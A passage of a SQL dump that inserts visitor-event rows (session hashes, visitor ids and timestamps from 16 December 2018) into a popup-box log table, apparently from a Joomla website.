(40076, 'e7f26004bd0412c5ffa9c8304c8a0854', '46713cac27a94b83', 0, 2, 1, '2018-12-16 09:15:20'),
(40077, '34a2d296c620c1c12dd1f5b71cb986e7', '220b6bed49713ca3', 0, 2, 1, '2018-12-16 09:17:13'),
(40078, 'ab95e3f8d9ff902a250ada098198eeae', '5aed09adfe7f433b', 0, 2, 1, '2018-12-16 09:17:20'),
(40079, '0ac2b4e002fd1a64672c2dd35cc124d3', 'b301d833ea94d585', 0, 2, 1, '2018-12-16 09:17:27'),
(40080, '2a777bc3ce0370284b4100b9bcbcf4f7', '296d9de09b136627', 0, 2, 1, '2018-12-16 09:18:06'),
(40081, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2018-12-16 09:18:15'),
(40082, '2d5642ac1994a712b47e780ff390e8bd', '6e117bd555667400', 0, 2, 1, '2018-12-16 09:18:22'),
(40083, '4eeb76ce394ddbb8f9847401ee42e00f', '8a144e5fc2e94311', 0, 2, 1, '2018-12-16 09:18:27'),
(40084, 'a70e9fea16bbc901f17a3b522e00480c', 'de580675a5823c8e', 0, 2, 1, '2018-12-16 09:19:03'),
(40085, 'a70e9fea16bbc901f17a3b522e00480c', 'de580675a5823c8e', 0, 2, 1, '2018-12-16 09:20:55'),
(40086, '34a2d296c620c1c12dd1f5b71cb986e7', '220b6bed49713ca3', 0, 2, 1, '2018-12-16 09:22:10'),
(40087, '2d5642ac1994a712b47e780ff390e8bd', '6e117bd555667400', 0, 2, 1, '2018-12-16 09:22:12'),
(40088, '58ae7aba201ff9d7878d91a9141494d9', '525abb4dc04ca54a', 0, 2, 1, '2018-12-16 09:24:01'),
(40089, '0648f2256e4c021b9b66f0238178d859', '81070426ca16cd24', 0, 2, 1, '2018-12-16 09:24:57'),
(40090, '0648f2256e4c021b9b66f0238178d859', '81070426ca16cd24', 0, 2, 1, '2018-12-16 09:27:41'),
(40091, '0648f2256e4c021b9b66f0238178d859', '81070426ca16cd24', 0, 2, 1, '2018-12-16 09:27:54'),
(40092, '82a816271bb1cc00059b3e62343724d0', '19ac418837a1bfb6', 0, 2, 1, '2018-12-16 09:28:12'),
(40093, '0648f2256e4c021b9b66f0238178d859', '81070426ca16cd24', 0, 2, 1, '2018-12-16 09:28:14'),
(40094, 'ebaeda032bfe474e4e570069e1681e08', '02f579590d954b94', 0, 2, 1, '2018-12-16 09:28:28'),
(40095, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 09:29:17'),
(40096, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 09:29:45'),
(40097, '2cded8939cf461680cda608083d36d76', 'f5ea342846f5c547', 0, 2, 1, '2018-12-16 09:30:37'),
(40098, '2cded8939cf461680cda608083d36d76', 'f5ea342846f5c547', 0, 2, 1, '2018-12-16 09:30:47'),
(40099, 'fe7f085832712bf9991915ce6e2b6887', '19ab584fab722c66', 0, 2, 1, '2018-12-16 09:31:52'),
(40100, '4d3a6437ce11e94a144ccf2e7419abcc', '669221b45098b35a', 0, 2, 1, '2018-12-16 09:34:34'),
(40101, '060711072ad9bb61f3047435e65c11b7', '6f46afb07d4df421', 0, 2, 1, '2018-12-16 09:36:00'),
(40102, '82a816271bb1cc00059b3e62343724d0', '19ac418837a1bfb6', 0, 2, 1, '2018-12-16 09:41:32'),
(40103, 'a85df5c4760841fe6b01eb9356895fae', '76fb03cb07ded8f7', 0, 2, 1, '2018-12-16 09:42:24'),
(40104, 'a85df5c4760841fe6b01eb9356895fae', '76fb03cb07ded8f7', 0, 2, 1, '2018-12-16 09:42:35'),
(40105, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 09:42:44'),
(40106, '0648f2256e4c021b9b66f0238178d859', '81070426ca16cd24', 0, 2, 1, '2018-12-16 09:46:03'),
(40107, '4b2f2c92b68c7b4ee58bfefa55812c6b', '6e117bd555667400', 0, 2, 1, '2018-12-16 09:46:06'),
(40108, 'eb0d327675fe64bca48335dc121d8266', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-16 09:46:07'),
(40109, '2114d7391656a3160e99318dddf8087d', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-16 09:46:49'),
(40110, '2114d7391656a3160e99318dddf8087d', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-16 09:48:01'),
(40111, '1234a1e0626fdc961f2d4ecf0d38a202', '069827ca06c91db5', 0, 2, 1, '2018-12-16 09:49:16'),
(40112, '1234a1e0626fdc961f2d4ecf0d38a202', '069827ca06c91db5', 0, 2, 1, '2018-12-16 09:49:27'),
(40113, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 09:54:36'),
(40114, 'fe7f085832712bf9991915ce6e2b6887', '19ab584fab722c66', 0, 2, 1, '2018-12-16 09:55:24'),
(40115, '4b2f2c92b68c7b4ee58bfefa55812c6b', '6e117bd555667400', 0, 2, 1, '2018-12-16 09:57:11'),
(40116, 'a4de96ddfb0d892278be56a7f86c601d', '5ba28c7f85521d3a', 0, 2, 1, '2018-12-16 09:57:51'),
(40117, 'e51e4e4fa804b9dce6418157e1457890', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-16 09:58:08'),
(40118, 'e51e4e4fa804b9dce6418157e1457890', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-16 09:58:17'),
(40119, '052f0a999dfeb589086f6f8e32f1c6a5', '4599e2ad4bb251fe', 0, 2, 1, '2018-12-16 10:00:52'),
(40120, '052f0a999dfeb589086f6f8e32f1c6a5', '4599e2ad4bb251fe', 0, 2, 1, '2018-12-16 10:01:10'),
(40121, '1234a1e0626fdc961f2d4ecf0d38a202', '069827ca06c91db5', 0, 2, 1, '2018-12-16 10:03:02'),
(40122, '1234a1e0626fdc961f2d4ecf0d38a202', '069827ca06c91db5', 0, 2, 1, '2018-12-16 10:03:48'),
(40123, '2114d7391656a3160e99318dddf8087d', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-16 10:04:13'),
(40124, '4b2f2c92b68c7b4ee58bfefa55812c6b', '6e117bd555667400', 0, 2, 1, '2018-12-16 10:04:38'),
(40125, '34a2d296c620c1c12dd1f5b71cb986e7', '220b6bed49713ca3', 0, 2, 1, '2018-12-16 10:06:13'),
(40126, '214b6a5d39b5ce102482226407d135ad', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 10:06:29'),
(40127, 'b72140a1c7bae76baa0ef9ace74bca0c', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-16 10:13:55');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(40128, '0648f2256e4c021b9b66f0238178d859', '81070426ca16cd24', 0, 2, 1, '2018-12-16 10:15:32'),
(40129, '1b3c53c44d318ae2811dd662373801cc', 'c020abbb40884763', 0, 2, 1, '2018-12-16 10:15:45'),
(40130, '1b3c53c44d318ae2811dd662373801cc', 'c020abbb40884763', 0, 2, 1, '2018-12-16 10:15:57'),
(40131, '0648f2256e4c021b9b66f0238178d859', '81070426ca16cd24', 0, 2, 1, '2018-12-16 10:16:20'),
(40132, '2114d7391656a3160e99318dddf8087d', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-16 10:16:31'),
(40133, '24afaf730828425fd995d0725609a93e', '15fdd013f34287ab', 0, 2, 1, '2018-12-16 10:17:02'),
(40134, '46382e279079a8b39699d0b9d06cadd1', '33089a3b34e40302', 0, 2, 1, '2018-12-16 10:17:26'),
(40135, '093b7bc04e26be7bbd4083d9a76ee793', 'f2be47c7b5e54850', 0, 2, 1, '2018-12-16 10:21:13'),
(40136, '093b7bc04e26be7bbd4083d9a76ee793', 'f2be47c7b5e54850', 0, 2, 1, '2018-12-16 10:22:18'),
(40137, '1b4692e5b59e4b9d41d859f1a7d4ebd5', '8a9a355b6c67c74a', 0, 2, 1, '2018-12-16 10:24:34'),
(40138, 'd1569a7837cd5e033bc6b216b0247ab5', 'c1afa73671a6ae95', 0, 2, 1, '2018-12-16 10:25:09'),
(40139, '51a49d64f1b05dcde5309248dabce5c0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 10:26:27'),
(40140, '57d604be8aa23aa6c82e5f4a0a1bb35c', '955783ad02dc4038', 0, 2, 1, '2018-12-16 10:26:35'),
(40141, 'ee1521792107ec1425df9431651731ef', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-16 10:26:59'),
(40142, '63ca1671dda606e896a8a30098dd2d7d', '27d3b62cdd82d36e', 0, 2, 1, '2018-12-16 10:28:11'),
(40143, 'd1569a7837cd5e033bc6b216b0247ab5', 'c1afa73671a6ae95', 0, 2, 1, '2018-12-16 10:29:39'),
(40144, '0b7acc280146404730912d788fafa528', '90fcbdb8d1478b18', 0, 2, 1, '2018-12-16 10:29:48'),
(40145, '0b7acc280146404730912d788fafa528', '90fcbdb8d1478b18', 0, 2, 1, '2018-12-16 10:30:08'),
(40146, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 10:32:32'),
(40147, 'b72140a1c7bae76baa0ef9ace74bca0c', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-16 10:32:50'),
(40148, '63ca1671dda606e896a8a30098dd2d7d', '27d3b62cdd82d36e', 0, 2, 1, '2018-12-16 10:32:51'),
(40149, '2114d7391656a3160e99318dddf8087d', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-16 10:32:54'),
(40150, '51a49d64f1b05dcde5309248dabce5c0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 10:33:02'),
(40151, '4eeb76ce394ddbb8f9847401ee42e00f', '8a144e5fc2e94311', 0, 2, 1, '2018-12-16 10:33:29'),
(40152, '2fa4580235bad20ebfb1d6f36888cf6c', 'c7d4ce8b0de12339', 0, 2, 1, '2018-12-16 10:33:30'),
(40153, 'dc04003652b254a17274adbfb4f469ce', 'dace6e0c219330fc', 0, 2, 1, '2018-12-16 10:33:33'),
(40154, '51a49d64f1b05dcde5309248dabce5c0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 10:33:35'),
(40155, 'b72140a1c7bae76baa0ef9ace74bca0c', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-16 10:33:42'),
(40156, '093b7bc04e26be7bbd4083d9a76ee793', 'f2be47c7b5e54850', 0, 2, 1, '2018-12-16 10:33:50'),
(40157, '1234a1e0626fdc961f2d4ecf0d38a202', '069827ca06c91db5', 0, 2, 1, '2018-12-16 10:33:53'),
(40158, '2cded8939cf461680cda608083d36d76', 'f5ea342846f5c547', 0, 2, 1, '2018-12-16 10:33:54'),
(40159, '0b7acc280146404730912d788fafa528', '90fcbdb8d1478b18', 0, 2, 1, '2018-12-16 10:33:55'),
(40160, '51a49d64f1b05dcde5309248dabce5c0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 10:34:01'),
(40161, '1234a1e0626fdc961f2d4ecf0d38a202', '069827ca06c91db5', 0, 2, 1, '2018-12-16 10:34:17'),
(40162, '2cded8939cf461680cda608083d36d76', 'f5ea342846f5c547', 0, 2, 1, '2018-12-16 10:34:22'),
(40163, 'b72140a1c7bae76baa0ef9ace74bca0c', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-16 10:34:35'),
(40164, '1234a1e0626fdc961f2d4ecf0d38a202', '069827ca06c91db5', 0, 2, 1, '2018-12-16 10:34:40'),
(40165, 'cebebd5f7a8703a2680f88b70ce7dfa1', '9fa71c818742c95f', 0, 2, 1, '2018-12-16 10:34:41'),
(40166, 'b72140a1c7bae76baa0ef9ace74bca0c', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-16 10:34:48'),
(40167, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 10:34:50'),
(40168, 'e51e4e4fa804b9dce6418157e1457890', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-16 10:34:52'),
(40169, '51a49d64f1b05dcde5309248dabce5c0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 10:34:57'),
(40170, 'ee1521792107ec1425df9431651731ef', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-16 10:35:03'),
(40171, '51a49d64f1b05dcde5309248dabce5c0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 10:35:05'),
(40172, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 10:35:22'),
(40173, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 10:35:33'),
(40174, 'ee1521792107ec1425df9431651731ef', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-16 10:35:38'),
(40175, '214b6a5d39b5ce102482226407d135ad', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 10:35:50'),
(40176, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 10:35:52'),
(40177, '4eeb76ce394ddbb8f9847401ee42e00f', '8a144e5fc2e94311', 0, 2, 1, '2018-12-16 10:35:56'),
(40178, 'b72140a1c7bae76baa0ef9ace74bca0c', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-16 10:36:03'),
(40179, '1e82946c7164d53d0e9fb5b01e33f6d4', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-16 10:36:12'),
(40180, '259acb8f54d2d75cd2db50009e8bb20a', 'b57104b37a2d8fd8', 0, 2, 1, '2018-12-16 10:36:15'),
(40181, '259acb8f54d2d75cd2db50009e8bb20a', 'b57104b37a2d8fd8', 0, 2, 1, '2018-12-16 10:36:22'),
(40182, 'ab95e3f8d9ff902a250ada098198eeae', '5aed09adfe7f433b', 0, 2, 1, '2018-12-16 10:36:29'),
(40183, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 10:36:40'),
(40184, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 10:36:41'),
(40185, 'e51e4e4fa804b9dce6418157e1457890', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-16 10:36:42'),
(40186, 'e51e4e4fa804b9dce6418157e1457890', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-16 10:36:48'),
(40187, '51a49d64f1b05dcde5309248dabce5c0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 10:37:04'),
(40188, '214b6a5d39b5ce102482226407d135ad', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 10:37:04'),
(40189, '2cded8939cf461680cda608083d36d76', 'f5ea342846f5c547', 0, 2, 1, '2018-12-16 10:37:04'),
(40190, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 10:37:06'),
(40191, '1e82946c7164d53d0e9fb5b01e33f6d4', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-16 10:37:15'),
(40192, '052f0a999dfeb589086f6f8e32f1c6a5', '4599e2ad4bb251fe', 0, 2, 1, '2018-12-16 10:37:20'),
(40193, '51a49d64f1b05dcde5309248dabce5c0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 10:37:27'),
(40194, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 10:37:31'),
(40195, '51a49d64f1b05dcde5309248dabce5c0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 10:37:32'),
(40196, 'ab95e3f8d9ff902a250ada098198eeae', '5aed09adfe7f433b', 0, 2, 1, '2018-12-16 10:37:47'),
(40197, '51a49d64f1b05dcde5309248dabce5c0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 10:37:47'),
(40198, '51a49d64f1b05dcde5309248dabce5c0', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 10:38:00'),
(40199, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 10:38:09'),
(40200, '248afba42d2623fef56123b97cf7297b', '6c83a398d699e2a3', 0, 2, 1, '2018-12-16 10:38:15'),
(40201, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 10:38:42'),
(40202, '24afaf730828425fd995d0725609a93e', '15fdd013f34287ab', 0, 2, 1, '2018-12-16 10:38:44'),
(40203, '214b6a5d39b5ce102482226407d135ad', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 10:38:56'),
(40204, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 10:39:39'),
(40205, '1b3c53c44d318ae2811dd662373801cc', 'c020abbb40884763', 0, 2, 1, '2018-12-16 10:40:10'),
(40206, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 10:40:12'),
(40207, '052f0a999dfeb589086f6f8e32f1c6a5', '4599e2ad4bb251fe', 0, 2, 1, '2018-12-16 10:40:32'),
(40208, '052f0a999dfeb589086f6f8e32f1c6a5', '4599e2ad4bb251fe', 0, 2, 1, '2018-12-16 10:40:42'),
(40209, '052f0a999dfeb589086f6f8e32f1c6a5', '4599e2ad4bb251fe', 0, 2, 1, '2018-12-16 10:40:49'),
(40210, '259acb8f54d2d75cd2db50009e8bb20a', 'b57104b37a2d8fd8', 0, 2, 1, '2018-12-16 10:41:00'),
(40211, '1b3c53c44d318ae2811dd662373801cc', 'c020abbb40884763', 0, 2, 1, '2018-12-16 10:43:01'),
(40212, '1b4692e5b59e4b9d41d859f1a7d4ebd5', '8a9a355b6c67c74a', 0, 2, 1, '2018-12-16 10:43:40'),
(40213, '1b4692e5b59e4b9d41d859f1a7d4ebd5', '8a9a355b6c67c74a', 0, 2, 1, '2018-12-16 10:43:58'),
(40214, 'b72140a1c7bae76baa0ef9ace74bca0c', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-16 10:44:43'),
(40215, 'd1569a7837cd5e033bc6b216b0247ab5', 'c1afa73671a6ae95', 0, 2, 1, '2018-12-16 10:45:04'),
(40216, 'd1569a7837cd5e033bc6b216b0247ab5', 'c1afa73671a6ae95', 0, 2, 1, '2018-12-16 10:45:32'),
(40217, '1e44449a9dcec6618e3bbd49a179efb5', 'db85c16d7bdc2a57', 0, 2, 1, '2018-12-16 10:47:17'),
(40218, '1e44449a9dcec6618e3bbd49a179efb5', 'db85c16d7bdc2a57', 0, 2, 1, '2018-12-16 10:47:31'),
(40219, 'e51e4e4fa804b9dce6418157e1457890', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-16 10:48:43'),
(40220, 'd8eeebad91012599fb0db081446e6770', 'a639f655bef0fc87', 0, 2, 1, '2018-12-16 10:50:52'),
(40221, '5e9d5bf71f0c4aa0fde6b69dd1eca6a2', 'bed8acb297070120', 0, 2, 1, '2018-12-16 10:51:35'),
(40222, '2d55af2d6b736e93ce631ed46308149d', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-16 10:51:49'),
(40223, '5e9d5bf71f0c4aa0fde6b69dd1eca6a2', 'bed8acb297070120', 0, 2, 1, '2018-12-16 10:52:12'),
(40224, '5e9d5bf71f0c4aa0fde6b69dd1eca6a2', 'bed8acb297070120', 0, 2, 1, '2018-12-16 10:54:09'),
(40225, '5e9d5bf71f0c4aa0fde6b69dd1eca6a2', 'bed8acb297070120', 0, 2, 1, '2018-12-16 10:55:12'),
(40226, 'e51e4e4fa804b9dce6418157e1457890', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-16 10:55:55'),
(40227, 'a85df5c4760841fe6b01eb9356895fae', '76fb03cb07ded8f7', 0, 2, 1, '2018-12-16 10:56:09'),
(40228, 'a85df5c4760841fe6b01eb9356895fae', '76fb03cb07ded8f7', 0, 2, 1, '2018-12-16 10:56:25'),
(40229, 'a85df5c4760841fe6b01eb9356895fae', '76fb03cb07ded8f7', 0, 2, 1, '2018-12-16 10:56:50'),
(40230, '1cf50d7ec7a3503122f18bd3e9219933', 'f48f21345f609603', 0, 2, 1, '2018-12-16 10:57:15'),
(40231, '1cf50d7ec7a3503122f18bd3e9219933', 'f48f21345f609603', 0, 2, 1, '2018-12-16 10:57:36'),
(40232, 'a85df5c4760841fe6b01eb9356895fae', '76fb03cb07ded8f7', 0, 2, 1, '2018-12-16 10:57:46'),
(40233, '1cf50d7ec7a3503122f18bd3e9219933', 'f48f21345f609603', 0, 2, 1, '2018-12-16 10:58:07'),
(40234, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 10:58:42'),
(40235, '357cc251489781be5266f0a627c4fbbd', '8a144e5fc2e94311', 0, 2, 1, '2018-12-16 11:00:38'),
(40236, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 11:00:46'),
(40237, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 11:01:20'),
(40238, '3c17138577a10f854a156ad2557cb525', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-16 11:01:26'),
(40239, 'ab95e3f8d9ff902a250ada098198eeae', '5aed09adfe7f433b', 0, 2, 1, '2018-12-16 11:03:22'),
(40240, '214b6a5d39b5ce102482226407d135ad', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 11:03:41'),
(40241, '20f3cf859ff35f0dedaa51216d9b829c', 'e38fbc76ae580892', 0, 2, 1, '2018-12-16 11:03:52'),
(40242, 'ab95e3f8d9ff902a250ada098198eeae', '5aed09adfe7f433b', 0, 2, 1, '2018-12-16 11:04:03'),
(40243, '214b6a5d39b5ce102482226407d135ad', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 11:04:35'),
(40244, '214b6a5d39b5ce102482226407d135ad', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 11:05:03'),
(40245, 'ff6d7a56bfba2b3b697b2c676a4bb0e3', '169323dd7e9aa10c', 0, 2, 1, '2018-12-16 11:05:31'),
(40246, '34a2d296c620c1c12dd1f5b71cb986e7', '220b6bed49713ca3', 0, 2, 1, '2018-12-16 11:05:33'),
(40247, 'dc04003652b254a17274adbfb4f469ce', 'dace6e0c219330fc', 0, 2, 1, '2018-12-16 11:06:49'),
(40248, 'e51e4e4fa804b9dce6418157e1457890', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-16 11:08:37'),
(40249, 'd42b22ce028164cf714b66dadc22af7a', 'c5b42dbb0bb6215a', 0, 2, 1, '2018-12-16 11:09:32'),
(40250, 'de4686d9c5b306f019b39813469303df', '9485c0cbaf2078d7', 0, 2, 1, '2018-12-16 11:13:21'),
(40251, '0648f2256e4c021b9b66f0238178d859', '81070426ca16cd24', 0, 2, 1, '2018-12-16 11:14:25'),
(40252, '0015415b9d853a60b31b055fb3450de3', '552f828db01a4f62', 0, 2, 1, '2018-12-16 11:14:33'),
(40253, '259acb8f54d2d75cd2db50009e8bb20a', 'b57104b37a2d8fd8', 0, 2, 1, '2018-12-16 11:17:42'),
(40254, '47285a60af7f579e2824c99f06e7f8d9', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:17:50'),
(40255, '246d9def1cb20bc6c9dce68df41a251e', '61d3b1b105794108', 0, 2, 1, '2018-12-16 11:17:51'),
(40256, '2f0a93b921aeffcff842428564946fad', '8c117e9ade9703d1', 0, 2, 1, '2018-12-16 11:17:57'),
(40257, '4298bdbb78c00b1ff7413771a009e94f', 'd6b9cd5bfdd27ced', 0, 2, 1, '2018-12-16 11:17:59'),
(40258, '7c3d3fb2d464869740cdd846ca0ec376', '2aaddecf4b23c2ee', 0, 2, 1, '2018-12-16 11:18:09'),
(40259, '4298bdbb78c00b1ff7413771a009e94f', 'd6b9cd5bfdd27ced', 0, 2, 1, '2018-12-16 11:18:23'),
(40260, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 11:18:30'),
(40261, '47285a60af7f579e2824c99f06e7f8d9', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:18:33'),
(40262, '2f0a93b921aeffcff842428564946fad', '8c117e9ade9703d1', 0, 2, 1, '2018-12-16 11:18:33'),
(40263, '7c3d3fb2d464869740cdd846ca0ec376', '2aaddecf4b23c2ee', 0, 2, 1, '2018-12-16 11:18:36'),
(40264, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 11:18:42'),
(40265, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 11:19:13'),
(40266, '052f0a999dfeb589086f6f8e32f1c6a5', '4599e2ad4bb251fe', 0, 2, 1, '2018-12-16 11:19:15'),
(40267, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 11:19:26'),
(40268, 'c0855c7b5f530f9bb3d3edc36a157373', '02ee6768142e877d', 0, 2, 1, '2018-12-16 11:19:52'),
(40269, 'bc77f170097b74e027a4d4444201dcf7', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-16 11:20:23'),
(40270, 'cebebd5f7a8703a2680f88b70ce7dfa1', '9fa71c818742c95f', 0, 2, 1, '2018-12-16 11:20:26'),
(40271, 'dc7983cb521b25a8f531ceb79231d429', 'cf4770793ce098e4', 0, 2, 1, '2018-12-16 11:21:34'),
(40272, '214b6a5d39b5ce102482226407d135ad', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 11:26:08'),
(40273, '4298bdbb78c00b1ff7413771a009e94f', 'd6b9cd5bfdd27ced', 0, 2, 1, '2018-12-16 11:26:19'),
(40274, '052f0a999dfeb589086f6f8e32f1c6a5', '4599e2ad4bb251fe', 0, 2, 1, '2018-12-16 11:28:11'),
(40275, 'b72140a1c7bae76baa0ef9ace74bca0c', '4f8f2dbd3b012e31', 0, 2, 1, '2018-12-16 11:28:29'),
(40276, '052f0a999dfeb589086f6f8e32f1c6a5', '4599e2ad4bb251fe', 0, 2, 1, '2018-12-16 11:28:40'),
(40277, '313170bbbe792278990d181c07b0b423', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:29:27'),
(40278, '24afaf730828425fd995d0725609a93e', '15fdd013f34287ab', 0, 2, 1, '2018-12-16 11:32:17'),
(40279, '313170bbbe792278990d181c07b0b423', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:33:38'),
(40280, 'f33e451930dc7817808ed31aff0fc38b', '3fdb63a2b57cd09e', 0, 2, 1, '2018-12-16 11:33:50'),
(40281, '8a37fd853717ca84496aa50b2d73b014', '5d5c6e272bdea80c', 0, 2, 1, '2018-12-16 11:34:03'),
(40282, 'fc588c7638ded41525de5c889f29db37', 'ead365992b655192', 0, 2, 1, '2018-12-16 11:34:12'),
(40283, 'fc588c7638ded41525de5c889f29db37', 'ead365992b655192', 0, 2, 1, '2018-12-16 11:34:20'),
(40284, '8a37fd853717ca84496aa50b2d73b014', '5d5c6e272bdea80c', 0, 2, 1, '2018-12-16 11:34:27'),
(40285, 'f33e451930dc7817808ed31aff0fc38b', '3fdb63a2b57cd09e', 0, 2, 1, '2018-12-16 11:34:34'),
(40286, '2f0a93b921aeffcff842428564946fad', '8c117e9ade9703d1', 0, 2, 1, '2018-12-16 11:36:07'),
(40287, '5accb5b3ca967b6153cbf123a7b85983', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:36:16'),
(40288, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2018-12-16 11:36:19'),
(40289, '579868eba76361d101d3f8891cee81c0', '1791b1aeb2327e22', 0, 2, 1, '2018-12-16 11:36:44'),
(40290, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2018-12-16 11:36:46'),
(40291, '9a4b1d8320b8e2ee86d3b8a722760d87', '00cfdd65313a346b', 0, 2, 1, '2018-12-16 11:37:01'),
(40292, '5accb5b3ca967b6153cbf123a7b85983', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:40:47'),
(40293, '5accb5b3ca967b6153cbf123a7b85983', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:41:07'),
(40294, '5accb5b3ca967b6153cbf123a7b85983', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:42:37'),
(40295, '5accb5b3ca967b6153cbf123a7b85983', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:43:06'),
(40296, '5accb5b3ca967b6153cbf123a7b85983', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:43:15'),
(40297, '5accb5b3ca967b6153cbf123a7b85983', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:43:40'),
(40298, '5accb5b3ca967b6153cbf123a7b85983', 'be7e6d1527f9da76', 0, 2, 1, '2018-12-16 11:44:00'),
(40299, '4fb5e4710d04e5511c1e85984fd3f5c8', '46713cac27a94b83', 0, 2, 1, '2018-12-16 11:44:31'),
(40300, '4fb5e4710d04e5511c1e85984fd3f5c8', '46713cac27a94b83', 0, 2, 1, '2018-12-16 11:44:45'),
(40301, '21faad4222c08b8f126877d00c93be5b', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 11:46:53'),
(40302, '21d9f50b3ed736241b06f7e2d67280fb', '7501b42c35accff7', 0, 2, 1, '2018-12-16 11:47:24'),
(40303, '460c1fa5d9cabdf8a046bc3787652e6c', 'b3e086714401d576', 0, 2, 1, '2018-12-16 11:48:08'),
